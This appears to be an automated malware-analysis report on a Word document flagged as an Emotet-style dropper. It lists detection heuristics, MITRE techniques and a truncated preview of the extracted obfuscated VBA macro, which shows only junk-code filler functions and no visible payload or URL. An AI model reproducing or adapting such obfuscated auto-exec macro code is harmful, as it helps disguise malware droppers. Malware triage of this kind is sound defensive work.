MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains a heavily obfuscated VBA macro that executes via the Document_Open auto-exec function. The macro utilizes CreateObject and Shell execution, indicative of a dropper. The ClamAV detection 'Doc.Dropper.Emodldr-6755244-0' further supports this. The script's obfuscation makes it difficult to determine the exact payload, but its intent is clearly to download and execute a secondary malicious file.
Heuristics 7
-
ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46787 bytes |
SHA-256: 05385abfb15c3a049be8daaba4e921caaced0f6161cc8b7f21457557d04596eb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function XsUfIv(aumTQIo As String, evOhYW As Double, nOhycPS As Integer, jUPjptj As Boolean, CeUEFn As Double) As String
BugTKjgp = LTrim("aGqtAmmJb&YuGML[q")
ZnGknBCz = Right(")LqnIy[rhY$@", 5)
JLQtw = 645 - 768 - 1967
uBUZeFx = Right("VQrDSSOfqt", 4)
JLQtw = LTrim("BsEOJL)QLKnF$#rj!?Q")
BugTKjgp = 531 - 1147 - 1747
NBWZB = 1831 + 246 + 1623
NBWZB = RTrim("&ZYgBnGY%NDpd#^s*L(n")
eCjAai = StrReverse("O.svpIwjAP]")
dTvoRg = UCase("kHaDCP%PJhpoq")
nQOid = Left("Su&[FjQ @jIn s", 2)
uBUZeFx = RTrim("J WNTlNvXw^o_Q-PJ.")
nQOid = LTrim("VEoe?jMFKK$sdlh&")
eCjAai = UCase("C^p UEB#gSOl_")
TmKMRPD = 481 + 927 + 665
nQOid = 359 - 382 - 277
NBWZB = StrReverse("[PnDXb_voB_LEm*DU)")
JLQtw = Left("*HH&Xe*TdivR!_eCra]", 2)
dTvoRg = RTrim("VbdSEzjzEsH&MGlK")
uBUZeFx = Right("y]l]GpU((Fbho", 5)
ZnGknBCz = UCase("ryN^%os(vQ-*IuX")
BugTKjgp = Left("X)tXn_wl$$", 3)
hNoap = 1155 - 100 - 1970
eCjAai = Right("*I)X&S*Qs@?ekYq", 5)
For QyRigy = 0 To 316
NBWZB = StrReverse("!JpmJrgarFQHem")
BugTKjgp = LTrim("@IW).u.XpQNvV")
NBWZB = LTrim("uk)]diD$)EjFMrUoxdcB")
nQOid = UCase("ypSVOcMADrsaA")
nQOid = "AAIIUqCtFmM?L[" + "Uy?mwYh?vW[pccjSv" + "]RrmA#*XQAAVHw]XLPG"
uBUZeFx = "v$yBluBHEsaQN$Y$H]%R" + "_C) CFf!ZilP%]msNHVX" + " NrjYS&A[uO)gWK#%wvJ"
Next QyRigy
DdFFiBCF = 1464 + 1073 + 1212
TmKMRPD = Right("ZTz&fq^[qhq", 4)
ZnGknBCz = StrReverse("lB .Bn-mNxheG ")
nQOid = 1789 + 872 + 568
TmKMRPD = Left("xuvLy%U!aEjUrN@", 5)
ZnGknBCz = "vKjfwZlE])" + "bTr)hni!PVn*S]hk#" + "#eu)v^euUtjey"
eCjAai = 1213 + 624 + 1019
nQOid = Left("i[jy& cNP_UqnU)mRM&", 5)
DdFFiBCF = " (hhO]g-%.Xjm.d F%x" + "uWAZxgo$jrn xL" + "]q]UPwp%n(j$CQBZ_Tu("
NBWZB = RTrim("SGJ$QOa$VR?Wp")
TmKMRPD = Space(19)
XsUfIv = "cdhTnEGdQVnfCMMYvMUQdUUaDveRIBYvFpyM"
End Function
Private Sub fCUfhMAWkC(fCuMFnR As String, CKXPuL As String, IaLCofZ As String, cbkMlk As String, ucDhgN As String, hiyFkZ As String, xHdLcwE As String)
DdFFiBCF = LTrim("bl M#$Kr.^g(eQIro")
ZnGknBCz = UCase("(m](TRD!y[qr]Rp^")
JLQtw = RTrim("% PghfoL*Z-)t-O")
ZnGknBCz = 789 + 1876 + 220
uBUZeFx = "KWi[OSAIn[.$yHAxDIv" + "tTz^^qb^ziMMl" + "vcPo*NxvjoeyAMpYW#m"
ZnGknBCz = LTrim("FsznyKVjoP")
ZnGknBCz = Space(3)
eCjAai = RTrim("G]eZKOypSJ)QTnZk*Y")
DdFFiBCF = Space(16)
ZnGknBCz = 1195 + 1392 + 611
nQOid = 997 + 1450 + 1525
BugTKjgp = "%yFTxrRkr$" + "HAiGMG?f(oLPXk" + "$BabI@Mx$ug%&VJU"
eCjAai = StrReverse("HbUBzHxUeG")
ZnGknBCz = Left("SxK_xHJHsxXnC?#", 5)
nQOid = 1071 - 1917 - 582
For VThmIr = 0 To 127
dTvoRg = StrReverse("U^Fy[N&DvdBaI?oX")
ZnGknBCz = LTrim("MWqPeIN@Fogsy]jlr]_")
uBUZeFx = UCase("rJfiGFDWim_")
ZnGknBCz = Right("fb#a?V& jviTGu_", 2)
eCjAai = Space(20)
TmKMRPD = "Ja!*[jC)![A]q@MFOAi" + "eU@FuJh*eUge&Bm" + "!CavWiJA@?QWT"
eCjAai = 123 - 837 - 1154
hNoap = 930 + 584 + 625
hNoap = StrReverse("dJkFsER[Zq.!Lx[(")
Next VThmIr
uBUZeFx = Left("yK!twbKRZZBGA", 5)
eCjAai = Space(7)
JLQtw = 804 + 594 + 989
NBWZB = Right("Fv@Ahx-mx-A#", 4)
For hwcmWU = 0 To 32
nQOid = LTrim("#i*pd*s EiY^")
BugTKjgp = Space(6)
hNoap = Right("JfhsKDHecD", 5)
hNoap = Space(13)
nQOid = 1625 + 143 + 1738
Next hwcmWU
NBWZB = 180 - 342 - 1959
DdFFiBCF = RTrim("x]qdlv?NlntNsNErX")
While ECWrrp < 395
NBWZB = Space(10)
JLQtw = Left("(vF]r^pb.Qsy-e", 4)
DdFFiBCF = LTrim("?f[*wD]LfE ih@#K]_LL")
ECWrrp = ECWrrp + 2
Wend
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.